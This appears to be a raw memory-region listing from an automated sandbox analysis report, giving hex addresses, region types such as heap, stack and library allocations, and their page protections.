7A40000
trusted library allocation
page execute and read and write
51D1000
trusted library allocation
page read and write
6507000
heap
page read and write
51C1000
trusted library allocation
page read and write
3530000
heap
page read and write
66A1000
trusted library allocation
page read and write
675F000
trusted library allocation
page read and write
6651000
heap
page read and write
6654000
heap
page read and write
88AD000
heap
page read and write
563B000
heap
page read and write
6544000
heap
page read and write
7040000
trusted library allocation
page read and write
65A0000
heap
page read and write
63F000
heap
page read and write
3420000
trusted library allocation
page read and write
6EDB000
stack
page read and write
3126000
heap
page read and write
3470000
trusted library allocation
page read and write
6531000
heap
page read and write
77BE000
stack
page read and write
734B000
stack
page read and write
35E3000
heap
page read and write
65A5000
heap
page read and write
6657000
heap
page read and write
DDE000
stack
page read and write
7C00000
trusted library allocation
page read and write
6B0D000
trusted library allocation
page read and write
35FC000
heap
page read and write
7CB0000
trusted library allocation
page read and write
753A000
heap
page read and write
2D59000
heap
page read and write
766E000
stack
page read and write
34E8000
heap
page read and write
6531000
heap
page read and write
6D65000
heap
page read and write
5636000
heap
page read and write
7A9A000
trusted library allocation
page read and write
7BF0000
trusted library allocation
page read and write
2E6E000
stack
page read and write
64E9000
heap
page read and write
33F0000
trusted library allocation
page read and write
34D0000
heap
page read and write
E90000
heap
page read and write
47A0000
heap
page readonly
34C0000
heap
page readonly
7A90000
trusted library allocation
page read and write
459E000
stack
page read and write
744D000
stack
page read and write
64FC000
heap
page read and write
582000
heap
page read and write
33E3000
trusted library allocation
page execute and read and write
74B0000
trusted library section
page read and write
6685000
heap
page read and write
2CB1000
heap
page read and write
55E1000
heap
page read and write
5648000
heap
page read and write
3460000
heap
page execute and read and write
7AFE000
stack
page read and write
4790000
trusted library allocation
page read and write
64F8000
heap
page read and write
151F000
stack
page read and write
5BEE000
stack
page read and write
653E000
heap
page read and write
5688000
heap
page read and write
358C000
heap
page read and write
758B000
stack
page read and write
5506000
trusted library allocation
page read and write
681D000
stack
page read and write
64E9000
heap
page read and write
8C50000
trusted library allocation
page read and write
5838000
trusted library allocation
page read and write
6970000
heap
page read and write
7BBD000
stack
page read and write
5297000
trusted library allocation
page read and write
2CBF000
heap
page read and write
7340000
direct allocation
page read and write
5436000
trusted library allocation
page read and write
33E0000
trusted library allocation
page read and write
652A000
heap
page read and write
7A40000
trusted library allocation
page execute and read and write
559F000
heap
page read and write
5AD9000
trusted library allocation
page read and write
6523000
heap
page read and write
7490000
trusted library allocation
page read and write
2DF7000
heap
page read and write
7C60000
trusted library allocation
page read and write
2780000
heap
page read and write
360C000
heap
page read and write
6660000
heap
page read and write
35F7000
heap
page read and write
64D1000
heap
page read and write
7982000
heap
page read and write
6550000
heap
page read and write
64FC000
heap
page read and write
6C8F000
stack
page read and write
7740000
trusted library allocation
page execute and read and write
63A1000
heap
page read and write
2CDB000
heap
page read and write
72F2000
direct allocation
page read and write
6B20000
trusted library allocation
page read and write
2DBC000
stack
page read and write
869C000
trusted library allocation
page read and write
549C000
stack
page read and write
6681000
heap
page read and write
65AF000
heap
page read and write
79E0000
heap
page read and write
7100000
heap
page read and write
3110000
heap
page read and write
68E000
stack
page read and write
75F8000
heap
page read and write
492E000
trusted library allocation
page read and write
5D2E000
stack
page read and write
3450000
trusted library allocation
page read and write
32EC000
heap
page read and write
64F7000
heap
page read and write
7C70000
trusted library allocation
page read and write
7D6E000
stack
page read and write
2CDB000
heap
page read and write
650B000
heap
page read and write
64C4000
heap
page read and write
547F000
trusted library allocation
page read and write
8210000
heap
page read and write
7871000
heap
page read and write
3279000
heap
page read and write
6B0E000
stack
page read and write
66A3000
trusted library allocation
page read and write
773E000
stack
page read and write
5699000
heap
page read and write
6654000
heap
page read and write
671D000
stack
page read and write
5644000
heap
page read and write
5621000
heap
page read and write
77E0000
trusted library allocation
page read and write
6651000
heap
page read and write
6685000
heap
page read and write
2CDB000
heap
page read and write
6CE000
stack
page read and write
2E8E000
stack
page read and write
6652000
heap
page read and write
6497000
heap
page read and write
5696000
heap
page read and write
650B000
heap
page read and write
2CDB000
heap
page read and write
6D2A000
heap
page read and write
733E000
stack
page read and write
730D000
stack
page read and write
7830000
trusted library allocation
page read and write
3337000
heap
page read and write
56B9000
trusted library allocation
page read and write
5642000
heap
page read and write
5648000
heap
page read and write
6E70000
heap
page read and write
4700000
heap
page read and write
2DFC000
stack
page read and write
6686000
heap
page read and write
491C000
trusted library allocation
page read and write
75EB000
heap
page read and write
6542000
heap
page read and write
6684000
heap
page read and write
7BAE000
stack
page read and write
72A0000
direct allocation
page read and write
4691000
trusted library allocation
page read and write
643F000
heap
page read and write
6490000
heap
page read and write
6613000
heap
page read and write
4D30000
heap
page read and write
6653000
heap
page read and write
679E000
stack
page read and write
70DB000
stack
page read and write
2CBB000
heap
page read and write
5CF000
heap
page read and write
3250000
heap
page read and write
3430000
trusted library allocation
page read and write
643A000
heap
page read and write
64F9000
heap
page read and write
12E8000
heap
page read and write
7947000
heap
page read and write
7970000
heap
page read and write
545E000
trusted library allocation
page read and write
61B1000
trusted library allocation
page read and write
2D06000
heap
page read and write
35E9000
heap
page read and write
2F10000
heap
page read and write
351E000
stack
page read and write
3415000
trusted library allocation
page execute and read and write
29F0000
heap
page read and write
4DE0000
heap
page read and write
2FAE000
stack
page read and write
64FC000
heap
page read and write
5685000
heap
page read and write
6651000
heap
page read and write
28D0000
trusted library allocation
page execute and read and write
889A000
heap
page read and write
7A30000
heap
page read and write
653E000
heap
page read and write
5686000
heap
page read and write
64FC000
heap
page read and write
32FF000
heap
page read and write
5612000
heap
page read and write
44A0000
heap
page execute and read and write
3410000
trusted library allocation
page read and write
87E0000
heap
page read and write
4DF0000
heap
page read and write
7A0B000
heap
page read and write
6FDA000
stack
page read and write
3608000
heap
page read and write
11C000
stack
page read and write
842B000
heap
page read and write
2CD0000
heap
page read and write
55D4000
heap
page read and write
6531000
heap
page read and write
30F0000
trusted library allocation
page read and write
64C0000
heap
page read and write
6654000
heap
page read and write
78F0000
heap
page execute and read and write
5640000
heap
page read and write
35EB000
heap
page read and write
6651000
heap
page read and write
6542000
heap
page read and write
54B1000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
6508000
heap
page read and write
8690000
trusted library allocation
page read and write
5638000
heap
page read and write
6531000
heap
page read and write
2C91000
heap
page read and write
675A000
stack
page read and write
647C000
heap
page read and write
2CE7000
heap
page read and write
6F90000
trusted library allocation
page read and write
2CD4000
heap
page read and write
6E9D000
stack
page read and write
5612000
heap
page read and write
57DE000
stack
page read and write
2CA5000
heap
page read and write
7400000
heap
page read and write
27D9000
trusted library allocation
page read and write
8820000
heap
page read and write
6655000
heap
page read and write
6AED000
trusted library allocation
page read and write
8C2E000
stack
page read and write
2D96000
heap
page read and write
5864000
heap
page read and write
79EE000
heap
page read and write
5598000
heap
page read and write
27D0000
trusted library allocation
page read and write
7B0E000
stack
page read and write
48B0000
trusted library allocation
page read and write
5030000
heap
page read and write
772D000
stack
page read and write
5610000
heap
page read and write
6413000
heap
page read and write
7050000
trusted library allocation
page read and write
71BE000
stack
page read and write
653E000
heap
page read and write
6FA0000
trusted library allocation
page read and write
7920000
heap
page read and write
4AC0000
heap
page read and write
55C5000
heap
page read and write
6635000
heap
page read and write
5846000
heap
page read and write
49E0000
heap
page execute and read and write
30CD000
unkown
page read and write
8680000
trusted library allocation
page read and write
35E3000
heap
page read and write
55B8000
heap
page read and write
4E5E000
stack
page read and write
878E000
stack
page read and write
733D000
stack
page read and write
8260000
heap
page read and write
653E000
heap
page read and write
86C0000
trusted library allocation
page read and write
6514000
heap
page read and write
6509000
heap
page read and write
6686000
heap
page read and write
648A000
heap
page read and write
7C50000
trusted library allocation
page read and write
5604000
heap
page read and write
643E000
heap
page read and write
3038000
stack
page read and write
6FE6000
trusted library allocation
page read and write
34F0000
heap
page read and write
8862000
heap
page read and write
6D2E000
heap
page read and write
643F000
heap
page read and write
3455000
trusted library allocation
page execute and read and write
65F7000
heap
page read and write
86A0000
trusted library allocation
page read and write
55F0000
heap
page read and write
5635000
heap
page read and write
72FF000
stack
page read and write
6A30000
trusted library allocation
page read and write
32AD000
heap
page read and write
5603000
heap
page read and write
63A0000
heap
page read and write
6513000
heap
page read and write
652C000
heap
page read and write
7A50000
trusted library allocation
page read and write
7B20000
trusted library allocation
page execute and read and write
74A0000
trusted library allocation
page read and write
35E6000
heap
page read and write
6651000
heap
page read and write
46F4000
trusted library allocation
page read and write
653E000
heap
page read and write
358C000
heap
page read and write
7810000
trusted library allocation
page read and write
28FA000
heap
page read and write
6660000
heap
page read and write
652A000
heap
page read and write
650B000
heap
page read and write
639E000
stack
page read and write
5648000
heap
page read and write
4759000
trusted library allocation
page read and write
2CC7000
heap
page read and write
27CD000
trusted library allocation
page execute and read and write
748E000
stack
page read and write
581E000
stack
page read and write
6513000
heap
page read and write
64D0000
heap
page read and write
6F3E000
stack
page read and write
3457000
trusted library allocation
page execute and read and write
643A000
heap
page read and write
7A19000
heap
page read and write
6E6D000
stack
page read and write
55A8000
trusted library allocation
page read and write
35E5000
heap
page read and write
62D7000
trusted library allocation
page read and write
28E0000
trusted library allocation
page read and write
7C20000
trusted library allocation
page read and write
337E000
stack
page read and write
2D09000
heap
page read and write
5499000
trusted library allocation
page read and write
661E000
heap
page read and write
4772000
trusted library allocation
page read and write
2DF8000
stack
page read and write
82ED000
stack
page read and write
30B0000
heap
page read and write
6681000
heap
page read and write
347F000
stack
page read and write
29F6000
heap
page read and write
361A000
heap
page read and write
6663000
heap
page read and write
79C6000
heap
page read and write
27C3000
trusted library allocation
page execute and read and write
4DCE000
stack
page read and write
6556000
heap
page read and write
5639000
heap
page read and write
64B8000
heap
page read and write
7A9E000
stack
page read and write
65B2000
heap
page read and write
5642000
heap
page read and write
652A000
heap
page read and write
2CAE000
heap
page read and write
4C27000
trusted library allocation
page read and write
65AF000
heap
page read and write
705A000
stack
page read and write
6513000
heap
page read and write
8740000
heap
page read and write
654C000
heap
page read and write
6681000
heap
page read and write
2CCA000
heap
page read and write
495E000
stack
page read and write
5638000
heap
page read and write
4AD1000
trusted library allocation
page read and write
EA0000
heap
page read and write
61D9000
trusted library allocation
page read and write
8230000
trusted library allocation
page read and write
3550000
heap
page read and write
7C80000
trusted library allocation
page read and write
661E000
heap
page read and write
568B000
heap
page read and write
4D26000
trusted library allocation
page read and write
502E000
stack
page read and write
3065000
heap
page read and write
6BCE000
stack
page read and write
8790000
heap
page read and write
3560000
heap
page read and write
6FC0000
trusted library allocation
page read and write
312A000
heap
page read and write
6615000
heap
page read and write
44D0000
heap
page read and write
4E00000
heap
page read and write
2CD4000
heap
page read and write
74CE000
stack
page read and write
6E00000
trusted library allocation
page read and write
360F000
heap
page read and write
53CC000
trusted library allocation
page read and write
310E000
unkown
page read and write
4C16000
heap
page read and write
3614000
heap
page read and write
652A000
heap
page read and write
2CE9000
heap
page read and write
5442000
trusted library allocation
page read and write
285E000
stack
page read and write
754B000
stack
page read and write
7385000
heap
page execute and read and write
643D000
heap
page read and write
83DB000
stack
page read and write
4FAC000
stack
page read and write
7CC0000
trusted library allocation
page read and write
2C40000
heap
page read and write
2CD4000
heap
page read and write
35F9000
heap
page read and write
3270000
heap
page read and write
30AF000
stack
page read and write
5A6E000
stack
page read and write
653E000
heap
page read and write
55F8000
heap
page read and write
7520000
heap
page read and write
33F9000
trusted library allocation
page read and write
2CE7000
heap
page read and write
49DE000
stack
page read and write
6550000
heap
page read and write
6FD0000
trusted library allocation
page read and write
6542000
heap
page read and write
2CC7000
heap
page read and write
69E0000
trusted library allocation
page read and write
27C4000
trusted library allocation
page read and write
55F8000
heap
page read and write
6686000
heap
page read and write
8A2C000
stack
page read and write
6432000
heap
page read and write
7030000
trusted library allocation
page read and write
27B0000
trusted library allocation
page read and write
6750000
trusted library allocation
page read and write
650B000
heap
page read and write
6662000
heap
page read and write
8680000
trusted library allocation
page read and write
33ED000
trusted library allocation
page execute and read and write
706D000
stack
page read and write
2ECE000
stack
page read and write
650B000
heap
page read and write
652A000
heap
page read and write
528A000
trusted library allocation
page read and write
87C0000
trusted library allocation
page read and write
3120000
heap
page read and write
66AA000
trusted library allocation
page read and write
33AE000
stack
page read and write
568B000
heap
page read and write
75C0000
heap
page read and write
481E000
stack
page read and write
7A04000
heap
page read and write
64FC000
heap
page read and write
2C7E000
heap
page read and write
6D7E000
heap
page read and write
461D000
stack
page read and write
5610000
heap
page read and write
6634000
heap
page read and write
7F570000
trusted library allocation
page execute and read and write
6D58000
heap
page read and write
35EC000
heap
page read and write
7780000
trusted library allocation
page read and write
86B0000
trusted library allocation
page read and write
6685000
heap
page read and write
3581000
heap
page read and write
6681000
heap
page read and write
490C000
trusted library allocation
page read and write
7830000
heap
page execute and read and write
832F000
stack
page read and write
7320000
heap
page read and write
5612000
heap
page read and write
653E000
heap
page read and write
455F000
stack
page read and write
73CE000
stack
page read and write
4D0C000
stack
page read and write
6685000
heap
page read and write
6514000
heap
page read and write
650F000
heap
page read and write
64FC000
heap
page read and write
7974000
heap
page read and write
51B1000
trusted library allocation
page read and write
652A000
heap
page read and write
2CBB000
heap
page read and write
28F0000
heap
page read and write
2CDF000
heap
page read and write
44A5000
heap
page execute and read and write
77D0000
trusted library allocation
page read and write
4DF7000
heap
page read and write
77F0000
trusted library allocation
page read and write
6655000
heap
page read and write
6550000
heap
page read and write
7BE0000
heap
page read and write
2D19000
heap
page read and write
4D3C000
stack
page read and write
5638000
heap
page read and write
62F7000
trusted library allocation
page read and write
4E03000
heap
page read and write
362E000
heap
page read and write
27F5000
trusted library allocation
page execute and read and write
35F7000
heap
page read and write
5648000
heap
page read and write
737B000
stack
page read and write
5640000
heap
page read and write
51A4000
trusted library allocation
page read and write
653E000
heap
page read and write
3730000
heap
page read and write
55CF000
heap
page read and write
8A50000
trusted library allocation
page read and write
6531000
heap
page read and write
6651000
heap
page read and write
88C4000
heap
page read and write
55F4000
heap
page read and write
5612000
heap
page read and write
7A60000
trusted library allocation
page read and write
66AE000
trusted library allocation
page read and write
55AD000
heap
page read and write
35E3000
heap
page read and write
740E000
stack
page read and write
2CAF000
heap
page read and write
7BE0000
trusted library allocation
page read and write
750E000
stack
page read and write
289F000
stack
page read and write
6683000
heap
page read and write
55BF000
heap
page read and write
79FF000
heap
page read and write
4D60000
heap
page execute and read and write
650B000
heap
page read and write
7B9E000
stack
page read and write
3538000
heap
page read and write
335E000
stack
page read and write
2D39000
heap
page read and write
64C5000
heap
page read and write
6B29000
trusted library allocation
page read and write
73A0000
direct allocation
page read and write
35E6000
heap
page read and write
5B3B000
trusted library allocation
page read and write
6D60000
heap
page read and write
3410000
trusted library allocation
page read and write
56DE000
stack
page read and write
737E000
stack
page read and write
1D0000
heap
page read and write
5648000
heap
page read and write
318A000
heap
page read and write
72E6000
direct allocation
page read and write
717E000
stack
page read and write
3150000
heap
page read and write
79E8000
heap
page read and write
7300000
direct allocation
page read and write
35F7000
heap
page read and write
55C9000
heap
page read and write
4744000
trusted library allocation
page read and write
7760000
trusted library allocation
page read and write
7380000
direct allocation
page read and write
796D000
heap
page read and write
66A5000
trusted library allocation
page read and write
6531000
heap
page read and write
587A000
trusted library allocation
page read and write
6654000
heap
page read and write
6D9B000
heap
page read and write
3364000
heap
page read and write
55D0000
heap
page read and write
561C000
heap
page read and write
4740000
trusted library allocation
page read and write
30FE000
stack
page read and write
5141000
trusted library allocation
page read and write
35FA000
heap
page read and write
27A0000
heap
page read and write
55AC000
heap
page read and write
3335000
heap
page read and write
28C9000
stack
page read and write
5614000
heap
page read and write
2CAE000
heap
page read and write
621B000
trusted library allocation
page read and write
6550000
heap
page read and write
62E8000
trusted library allocation
page read and write
6438000
heap
page read and write
6990000
trusted library allocation
page read and write
88BD000
heap
page read and write
55E8000
heap
page read and write
7A15000
heap
page read and write
527F000
trusted library allocation
page read and write
77A0000
trusted library allocation
page read and write
7B7E000
stack
page read and write
2D5E000
heap
page read and write
323D000
stack
page read and write
4AAD000
stack
page read and write
6528000
heap
page read and write
709E000
stack
page read and write
2C30000
heap
page read and write
35F7000
heap
page read and write
54C6000
trusted library allocation
page read and write
7BF0000
trusted library allocation
page execute and read and write
2E4E000
stack
page read and write
5688000
heap
page read and write
3612000
heap
page read and write
7750000
trusted library allocation
page read and write
4D65000
heap
page execute and read and write
3540000
trusted library allocation
page execute and read and write
6B8E000
stack
page read and write
643A000
heap
page read and write
27F0000
trusted library allocation
page read and write
35EE000
heap
page read and write
55F5000
heap
page read and write
49E5000
heap
page execute and read and write
7530000
heap
page read and write
68DD000
stack
page read and write
474D000
trusted library allocation
page execute and read and write
12CE000
stack
page read and write
86B0000
trusted library allocation
page execute and read and write
10FC000
stack
page read and write
6550000
heap
page read and write
2D4C000
heap
page read and write
2D58000
heap
page read and write
6685000
heap
page read and write
67DF000
stack
page read and write
750B000
stack
page read and write
3603000
heap
page read and write
675B000
trusted library allocation
page read and write
6513000
heap
page read and write
6614000
heap
page read and write
722E000
stack
page read and write
5E7000
heap
page read and write
651C000
heap
page read and write
6681000
heap
page read and write
5580000
heap
page read and write
6492000
heap
page read and write
55C6000
heap
page read and write
361B000
heap
page read and write
2CB1000
heap
page read and write
6542000
heap
page read and write
64FC000
heap
page read and write
68D0000
trusted library allocation
page read and write
3120000
heap
page read and write
2C68000
heap
page read and write
6960000
heap
page read and write
5699000
heap
page read and write
55A0000
heap
page read and write
651F000
heap
page read and write
66B5000
trusted library allocation
page read and write
2D5E000
heap
page read and write
6681000
heap
page read and write
653E000
heap
page read and write
64E9000
heap
page read and write
55EF000
heap
page read and write
75D2000
heap
page read and write
7820000
trusted library allocation
page read and write
3424000
trusted library allocation
page read and write
86E0000
heap
page read and write
2D55000
heap
page read and write
141E000
stack
page read and write
5619000
heap
page read and write
75DB000
heap
page read and write
6542000
heap
page read and write
727F000
stack
page read and write
2CEB000
heap
page read and write
361C000
heap
page read and write
6490000
heap
page read and write
5690000
heap
page read and write
5590000
heap
page read and write
5648000
heap
page read and write
563B000
heap
page read and write
47E7000
trusted library allocation
page read and write
7BDD000
stack
page read and write
6684000
heap
page read and write
6523000
heap
page read and write
6169000
trusted library allocation
page read and write
652C000
heap
page read and write
2CD4000
heap
page read and write
6550000
heap
page read and write
3430000
trusted library allocation
page read and write
86FE000
stack
page read and write
73AE000
direct allocation
page read and write
D2D000
stack
page read and write
2C30000
heap
page read and write
4E60000
heap
page read and write
329D000
heap
page read and write
64E9000
heap
page read and write
34AE000
stack
page read and write
6685000
heap
page read and write
79CC000
heap
page read and write
760A000
heap
page read and write
65A1000
heap
page read and write
653E000
heap
page read and write
5648000
heap
page read and write
362A000
heap
page read and write
5624000
heap
page read and write
4730000
trusted library allocation
page read and write
652C000
heap
page read and write
754E000
stack
page read and write
7840000
trusted library allocation
page read and write
7BC0000
trusted library allocation
page read and write
3423000
trusted library allocation
page execute and read and write
7B6E000
stack
page read and write
643D000
heap
page read and write
54F0000
heap
page read and write
55A1000
heap
page read and write
6E20000
trusted library allocation
page read and write
35F7000
heap
page read and write
5285000
trusted library allocation
page read and write
27F2000
trusted library allocation
page read and write
754C000
heap
page read and write
7989000
heap
page read and write
D90000
heap
page read and write
48A0000
trusted library allocation
page execute and read and write
35F4000
heap
page read and write
4FA0000
heap
page read and write
6662000
heap
page read and write
652A000
heap
page read and write
5F6C000
stack
page read and write
2CDF000
heap
page read and write
65F8000
heap
page read and write
645000
heap
page read and write
76EE000
stack
page read and write
55C1000
heap
page read and write
652C000
heap
page read and write
77B0000
trusted library allocation
page read and write
342D000
trusted library allocation
page execute and read and write
7900000
trusted library allocation
page read and write
7962000
heap
page read and write
64E9000
heap
page read and write
4A6C000
stack
page read and write
773E000
stack
page read and write
2C50000
heap
page read and write
4775000
trusted library allocation
page execute and read and write
2FFE000
stack
page read and write
7590000
heap
page read and write
6660000
heap
page read and write
2CA2000
heap
page read and write
6613000
heap
page read and write
652C000
heap
page read and write
6519000
heap
page read and write
35E4000
heap
page read and write
5638000
heap
page read and write
6634000
heap
page read and write
4670000
trusted library allocation
page read and write
76FE000
stack
page read and write
5630000
heap
page read and write
4D20000
heap
page read and write
652C000
heap
page read and write
55FB000
heap
page read and write
29C6000
stack
page read and write
7AA0000
trusted library allocation
page read and write
701E000
stack
page read and write
4CCE000
stack
page read and write
8D3D000
stack
page read and write
7C30000
trusted library allocation
page read and write
27A7000
heap
page read and write
723E000
stack
page read and write
6513000
heap
page read and write
7C60000
trusted library allocation
page read and write
6495000
heap
page read and write
6F40000
heap
page read and write
55C0000
heap
page read and write
6BF0000
trusted library allocation
page read and write
72E2000
direct allocation
page read and write
158000
stack
page read and write
29A8000
stack
page read and write
There are 1186 hidden memdumps, click here to show them.